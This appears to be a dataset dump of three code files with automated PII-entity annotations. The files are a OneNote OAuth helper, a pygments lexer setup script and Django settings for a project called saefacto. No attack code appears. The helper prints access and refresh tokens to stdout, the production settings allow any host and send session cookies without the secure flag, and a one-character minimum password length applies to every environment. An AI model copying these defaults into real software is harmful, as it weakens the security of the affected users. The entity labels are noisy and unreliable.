'.should.be.gr'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'subnet.id'], ['URL', 'group1.na'], ['URL', 'group2.id'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'enis.sh'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', '.id.sh'], ['URL', 'eni.id'], ['URL', 'instance.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'instance.groups.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 
'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.pr'], ['URL', 'addresses.sh'], ['URL', 'eni.pr'], ['URL', 'address.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'subnet.id'], ['URL', 'group1.id'], ['URL', 'boto.ec2.net'], ['URL', 'eni.id'], ['URL', 'conn.ru'], ['URL', 'group2.id'], ['URL', 'reservation.in'], ['URL', 'instance.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'conn.ge'], ['URL', 'enis.sh'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', 'eni.id.sh'], ['URL', 'eni.id'], ['URL', 'eni.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.pr'], ['URL', 'addresses.sh'], ['URL', 'eni.pr'], ['URL', 'address.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'group1.id'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'subnet.id'], ['URL', 'group2.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group2.id'], ['URL', 'conn.at'], ['URL', 'eni.id'], ['URL', 'instance.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.at'], ['URL', 'eni.id'], ['URL', 'instance.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', 'eni.id.sh'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'conn.ge'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'conn.de'], ['URL', 'eni.attachment.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.de'], ['URL', 'eni.attachment.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'conn.ge'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group2.id'], ['URL', 'conn.de'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidAttachmentID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'address.sh'], ['URL', 'name.should.co'], ['URL', 'address.re'], ['URL', 'instance.pr'], ['URL', 'address.sh'], ['URL', 'instance.pr'], ['URL', 'name.should.co'], ['URL', 'instance.pr'], ['URL', 'address.re'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.ke'], ['URL', 'name.sh'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'volume.cr'], ['URL', 'snapshot.sn'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'snapshot.sn'], ['URL', 'boto.co'], ['URL', 'conn.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'status.status.sh'], ['URL', 'status.status.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], 
['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'instance.id'], ['URL', '.id.sh'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'instance.id'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidInstanceID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto3.cl'], ['URL', 'conn.ru'], ['URL', 'conn.de'], ['URL', 'boto3.cl'], ['URL', 'conn.ru'], ['URL', 'conn.st'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.st'], ['URL', 'conn.ge'], ['URL', 'status.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'name.sh'], ['URL', 'conn.ge'], ['URL', 'status.sh'], ['URL', 's.id'], ['URL', 'instance1.id'], ['URL', 'status1.st'], ['URL', 'name.sh'], ['URL', 's.id'], ['URL', 'instance2.id'], ['URL', 'status2.st'], ['URL', 'name.sh'], ['URL', 's.id'], ['URL', 'instance3.id'], ['URL', 'status3.st'], ['URL', 'name.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'conn.cr'], ['URL', 'conn.mo'], ['URL', 'instance.id'], ['URL', 'group.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.mo'], ['URL', 'instance.id'], ['URL', 'group.id'], ['URL', 'group.in'], ['URL', 'instance.id'], ['URL', 'boto3.re'], ['URL', 'client.cr'], ['URL', '.should.be'], ['URL', 'instance.mo'], ['URL', '.should.be'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'optimized.should.be'], ['URL', 'instance.mo'], ['URL', 'optimized.should.be'], ['URL', 'resource.cr'], ['URL', 'optimized.should.be'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', '.should.be'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'response.should.have.ke'], ['URL', 'response.should.have.ke'], ['URL', '.should.be'], ['URL', 'client.de'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.re'], ['URL', 'ec2.cr']] |
69 | """
PyOneNote.py
~~~~~~~~~~~~~~~~~
This module contains basic OAuth 2 authentication and basic handlers for GET and POST operations.
This work was just a quick hack to migrate notes from an old database to OneNote, but it should help you to understand
the request structure of OneNote.
Copyright (c) 2016 Coffeemug13. All rights reserved. Licensed under the MIT license.
See LICENSE in the project root for license information.
"""
import requests
class OAuth():
"""Handles the authentication for all requests"""
def __init__(self, client_id, client_secret, code=None, token=None, refresh_token=None):
""" This information is obtained upon registration of a new Outlook Application
The values are just for information and not valid
:param client_id: "cda3ffaa-2345-a122-3454-adadc556e7bf"
:param client_secret: "AABfsafd6Q5d1VZmJQNsdac"
:param code: = "PI:KEY"
:param token: = "EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW......"
        :param refresh_token: = "MCKKgf55PCiM2aACbIYads*sdsa%*PWYNj436348v......" """
self.client_id = client_id
self.client_secret = client_secret
self.code = code
self.token = token
self.rtoken = refresh_token
self.redirect_uri = 'https://localhost'
self.session = requests.Session()
@staticmethod
def get_authorize_url(client_id):
"open this url in a browser to let the user grant access to onenote. Extract from the return URL your access code"
url = "https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost".format(
client_id)
return url
def get_token(self):
"""
Make the following request with e.g. postman:
POST https://login.live.com/oauth20_token.srf
Content-Type:application/x-www-form-urlencoded
grant_type:authorization_code
client_id:cda3ffaa-2345-a122-3454-adadc556e7bf
client_secret:AABfsafd6Q5d1VZmJQNsdac
code:111111111-1111-1111-1111-111111111111
redirect_uri:https://localhost
OneNote will return as result:
{
"token_type": "bearer",
"expires_in": 3600,
"scope": "wl.signin wl.offline_access wl.basic office.onenote_create office.onenote",
"access_token": "AxxdWR1DBAAUGCCXc8wU/....",
"refresh_token": "DR3DDEQJPCiM2aACbIYa....",
"user_id": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
"""
raise NotImplementedError("")
def refresh_token(self):
"""
        Make the following request to refresh your token with e.g. postman:
POST https://login.live.com/oauth20_token.srf
Content-Type:application/x-www-form-urlencoded
grant_type:refresh_token
client_id:cda3ffaa-2345-a122-3454-adadc556e7bf
client_secret:AABfsafd6Q5d1VZmJQNsdac
refresh_token:DR3DDEQJPCiM2aACbIYa....
redirect_uri:https://localhost
-->
{
"token_type": "bearer",
"expires_in": 3600,
"scope": "wl.signin wl.offline_access wl.basic office.onenote_create office.onenote",
"access_token": "EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW...",
"refresh_token": "DSFDSGSGFABDBGFGBFGF5435kFGDd2J6Bco2Pv2ss...",
"user_id": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
"""
url = 'https://login.live.com/oauth20_token.srf'
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"grant_type": "refresh_token",
"client_id": self.client_id,
"client_secret": self.client_secret,
"refresh_token": self.rtoken,
"redirect_uri": self.redirect_uri}
result = self.session.post(url, headers=headers, data=data)
print("Refreshed token: " + result.text)
refresh = result.json()
self.expire = refresh.get('expires_in')
self.token = refresh.get('access_token')
self.rtoken = refresh.get('refresh_token')
print("Token: " + self.token)
print("Refresh Token: " + self.rtoken)
return True
def _get(self, url, query):
"""Handles GET Request with Authentication"""
headers = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token}
result = self.session.get(url, headers=headers, params=query)
print("GET " + result.url)
print(result.headers)
if (result.text):
print(result.text)
return result
def _post(self, url: str, headers: list, data: str = None, files: list = None):
"""Handles POST Request with Authentication"""
newHeaders = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token}
if data:
newHeaders.update(headers)
result = self.session.post(url, headers=newHeaders, data=data)
else:
result = self.session.post(url, headers=newHeaders, files=files)
# result.request.headers
print("POST " + result.url)
print(result.headers)
if (result.text):
print(result.text)
return result
def post(self, url: str, headers: list, data: str = None, files: list = None):
"""post something and handle token expire transparent to the caller"""
try:
result = self._post(url, headers, data=data, files=files)
if (result.status_code not in (200, 201)):
print("Error: " + str(result.status_code))
if (result.status_code == 401):
print("Refreshing token")
if self.refresh_token():
result = self._post(url, headers, data, files=files)
else:
print('Failed retry refreshing token')
return result
except Exception as e:
print(e)
pass
def get(self, url, query, headers=None):
"""get something and handle token expire transparent to the caller"""
try:
result = self._get(url, query)
if (result.status_code != requests.codes.ok):
print("Error: " + str(result.status_code))
if (result.status_code == 401):
print("Refreshing token")
if self.refresh_token():
result = self._get(url, query)
else:
print('Failed retry refreshing token')
return result
except Exception as e:
print(e)
pass
def get_credentials(self):
"""Return the actual credentials of this OAuth Instance
:return client_id:"""
return self.client_id, self.client_secret, self.code, self.token, self.rtoken
class OneNote(OAuth):
"""This class wraps some OneNote specific calls"""
def __init__(self, client_id, client_secret, code, token, rtoken):
super().__init__(client_id, client_secret, code, token, rtoken)
self.base = "https://www.onenote.com/api/v1.0/me/"
def list_notebooks(self):
url = self.base + "notes/notebooks"
query = {'top': '5'}
result = self.get(url, query)
n = None
if (result):
notebooks = result.json()
# result_serialized = json.dumps(result.text)
# notebook = json.loads(result_serialized)
n = notebooks["value"][0]
x = 1
return n
def post_page(self, section_id: str, created, title: str, content: str, files: list = None):
"""post a page. If you want to provide additional images to the page provide them as file list
in the same way like posting multipart message in 'requests'
.:param content: valid html text with Umlaute converted to ä"""
url = self.base + "notes/sections/" + section_id + "/pages"
headers = {"Content-Type": "application/xhtml+xml"}
# the basic layout of a page is always same
data = """<?xml version="1.0" encoding="utf-8" ?>
<html>
<head>
<title>{0}</title>
<meta name="created" content="{1}"/>
</head>
<body data-absolute-enabled="true">
<div>
{2}
</div>
</body>
</html>
""".format(title, created, content)
result = None
if files:
"post as multipart"
newFiles = [('Presentation', (None, data, 'application/xhtml+xml', {'Content-Encoding': 'utf8'}))]
newFiles.extend(files)
result = self.post(url, {}, None, files=newFiles)
else:
"post as simple request"
result = self.post(url, headers, data)
n = None
if (result):
notebooks = result.json()
# result_serialized = json.dumps(result.text)
# notebook = json.loads(result_serialized)
# n = notebooks["value"][0]
x = 1
return notebooks
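# Illustrative usage (all credential values are placeholders; no such driver
# code exists in the original module):
#   on = OneNote(client_id, client_secret, code, token, rtoken)
#   notebook = on.list_notebooks()
#   on.post_page(section_id, "2016-01-01", "Title", "<p>Hello</p>")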
| 9,316 | [['URL', 'https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost".format'], ['URL', "https://login.live.com/oauth20_token.srf'"], ['DATE_TIME', '2016'], ['PERSON', 'self.rtoken ='], ['PERSON', 'self.rtoken'], ['URL', 'self.se'], ['PERSON', 'self.rtoken'], ['URL', 'self.session.ge'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'result.st'], ['URL', 'requests.co'], ['LOCATION', 'self.base'], ['LOCATION', 'self.base'], ['URL', 'self.ba'], ['URL', 'self.ge'], ['PERSON', 'Umlaute'], ['LOCATION', 'self.base'], ['URL', 'self.ba'], ['URL', 'https://login.live.com/oauth20_token.srf'], ['URL', 'https://login.live.com/oauth20_token.srf'], ['URL', 'https://www.onenote.com/api/v1.0/me/"'], ['URL', 'PyOneNote.py'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.to'], ['URL', 'self.red'], ['URL', 'self.se'], ['URL', 'requests.Se'], ['URL', 'wl.si'], ['URL', 'wl.ba'], ['URL', 'wl.si'], ['URL', 'wl.ba'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.red'], ['URL', 'refresh.ge'], ['URL', 'self.to'], ['URL', 'refresh.ge'], ['URL', 'refresh.ge'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'result.re'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'self.re'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'self.re'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.to'], ['URL', 'self.ba']] |
70 | """pygments-sisal module setup script for distribution."""
from __future__ import with_statement
import os
import setuptools
def get_version(filename):
with open(filename) as fh:
for line in fh:
if line.startswith('__version__'):
return line.split('=')[-1].strip()[1:-1]
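# Illustrative note (not part of the original script): for a line such as
# __version__ = '1.0.2' in pygments_sisal/__init__.py, get_version() returns
# '1.0.2' -- strip()[1:-1] removes the surrounding quote characters.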
setuptools.setup(
name='pygments-sisal',
version=get_version(os.path.join('pygments_sisal', '__init__.py')),
author='Alexander Asp Bock',
    author_email='dummy@email.com',
platforms='All',
description=('A pygments lexer for SISAL'),
install_requires=['Pygments>=2.0'],
license='MIT',
keywords='pygments, lexer, sisal',
url='https://github.com/MisanthropicBit/pygments-sisal',
packages=setuptools.find_packages(),
long_description=open('README.md').read(),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Utilities',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5'
],
# Pygments entry point
entry_points="[pygments.lexers]\n"
"sisal=pygments_sisal:SisalLexer"
)
| 1,467 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', "Asp Bock'"], ['URL', "https://github.com/MisanthropicBit/pygments-sisal',"], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'line.st'], ['URL', 'setuptools.se'], ['URL', 'os.path.jo'], ['URL', 'email.com'], ['URL', 'setuptools.fi'], ['URL', 'README.md']] |
71 | # -*- coding: utf-8 -*-
"""
Django settings for saefacto project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from os.path import join
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
try:
from S3 import CallingFormat
AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN
except ImportError:
    # TODO: Fix this; the S3 import is attempted even in Dev.
pass
from configurations import Configuration, values
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
class Common(Configuration):
########## APP CONFIGURATION
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# 'suit',
# Admin
'django.contrib.admin',
'django.contrib.admindocs',
)
THIRD_PARTY_APPS = (
'south', # Database migration helpers:
'crispy_forms', # Form layouts
'avatar', # for user avatars
'sitetree',
'sitetree_smartadmin',
'django_user_agents',
'statici18n', # javascript
'parsley',
)
# Apps specific for this project go here.
LOCAL_APPS = (
'users', # custom users app
'core',
'main',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
INSTALLED_APPS += (
# Needs to come last for now because of a weird edge case between
# South and allauth
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
########## END APP CONFIGURATION
########## MIDDLEWARE CONFIGURATION
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django_user_agents.middleware.UserAgentMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## DEBUG
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = values.BooleanValue(False)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
# In production, this is changed to a values.SecretValue() setting
SECRET_KEY = "CHANGEME!!!"
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
join(BASE_DIR, 'fixtures'),
)
########## END FIXTURE CONFIGURATION
########## EMAIL CONFIGURATION
EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend')
########## END EMAIL CONFIGURATION
########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
        ('Fábio C. Barrionuevo da Luz', 'dummy@email.com'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = values.DatabaseURLValue('postgres://localhost/saefacto')
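    # Note (assumption based on django-configurations defaults): DatabaseURLValue
    # reads the DATABASE_URL environment variable when it is set, so the URL
    # above acts only as a fallback, e.g.:
    #   DATABASE_URL=postgres://user:pass@host:5432/saefacto python manage.py runserver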
########## END DATABASE CONFIGURATION
########## CACHING
    # Do this here because, thanks to django-pylibmc-sasl and pylibmc, memcacheify is painful to install on windows.
# memcacheify is what's used in Production
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
########## END CACHING
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Araguaina'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'pt-br'
LANGUAGES = (
('pt-br', u'Português do Brasil'),
('en', 'English'),
('es', u'Español'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
########## END GENERAL CONFIGURATION
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
"allauth.account.context_processors.account",
"allauth.socialaccount.context_processors.socialaccount",
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
# Your stuff: custom template context processers go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
join(BASE_DIR, 'templates'),
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
########## END TEMPLATE CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
join(BASE_DIR, 'static'),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## URL Configuration
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
########## End URL Configuration
########## AUTHENTICATION CONFIGURATION
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = "username"
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = "mandatory"
ACCOUNT_PASSWORD_MIN_LENGTH = 1
########## END AUTHENTICATION CONFIGURATION
########## Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = "users.User"
LOGIN_REDIRECT_URL = "users:redirect"
########## END Custom user app defaults
########## SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = "slugify.slugify"
########## END SLUGLIFIER
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## Your common stuff: Below this line define 3rd party libary settings
class Local(Common):
########## DEBUG
DEBUG = values.BooleanValue(True)
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
########## END INSTALLED_APPS
########## Mail settings
EMAIL_HOST = "localhost"
EMAIL_PORT = 1025
EMAIL_BACKEND = values.Value('django.core.mail.backends.console.EmailBackend')
########## End mail settings
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
#DATABASES = values.DatabaseURLValue('postgres://localhost/projetosgt')
DATABASES = values.DatabaseURLValue('sqlite:////{0}.sqlite'.format(join(BASE_DIR, 'sae_db')))
########## END DATABASE CONFIGURATION
########## django-debug-toolbar
MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TEMPLATE_CONTEXT': True,
}
########## end django-debug-toolbar
########## Your local stuff: Below this line define 3rd party libary settings
#SITETREE_MODEL_TREE = 'sitetree_smartadmin.SmartTree'
SITETREE_MODEL_TREE_ITEM = 'sitetree_smartadmin.SmartTreeItem'
class Production(Common):
########## INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
INSTALLED_APPS += ('allauth.socialaccount.providers.facebook',
'allauth.socialaccount.providers.github', )
########## END INSTALLED_APPS
########## SECRET KEY
SECRET_KEY = values.SecretValue()
########## END SECRET KEY
########## django-secure
INSTALLED_APPS += ("djangosecure", )
# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True)
SECURE_FRAME_DENY = values.BooleanValue(True)
SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True)
SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True)
SESSION_COOKIE_SECURE = values.BooleanValue(False)
SESSION_COOKIE_HTTPONLY = values.BooleanValue(True)
SECURE_SSL_REDIRECT = values.BooleanValue(True)
########## end django-secure
########## SITE CONFIGURATION
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ["*"]
########## END SITE CONFIGURATION
INSTALLED_APPS += ("gunicorn", )
########## STORAGE CONFIGURATION
# See: http://django-storages.readthedocs.org/en/latest/index.html
INSTALLED_APPS += (
'storages',
)
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = values.SecretValue()
AWS_SECRET_ACCESS_KEY = values.SecretValue()
AWS_STORAGE_BUCKET_NAME = values.SecretValue()
AWS_AUTO_CREATE_BUCKET = True
AWS_QUERYSTRING_AUTH = False
# see: https://github.com/antonagestam/collectfast
AWS_PRELOAD_METADATA = True
INSTALLED_APPS += ("collectfast", )
# AWS cache settings, don't change unless you know what you're doing:
AWS_EXPIREY = 60 * 60 * 24 * 7
AWS_HEADERS = {
'Cache-Control': 'max-age=%d, s-maxage=%d, must-revalidate' % (AWS_EXPIREY,
AWS_EXPIREY)
}
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
########## END STORAGE CONFIGURATION
########## EMAIL
DEFAULT_FROM_EMAIL = values.Value(
'saefacto dummy@email.com')
EMAIL_HOST = values.Value('smtp.sendgrid.com')
EMAIL_HOST_PASSWORD = values.SecretValue(environ_prefix="", environ_name="SENDGRID_PASSWORD")
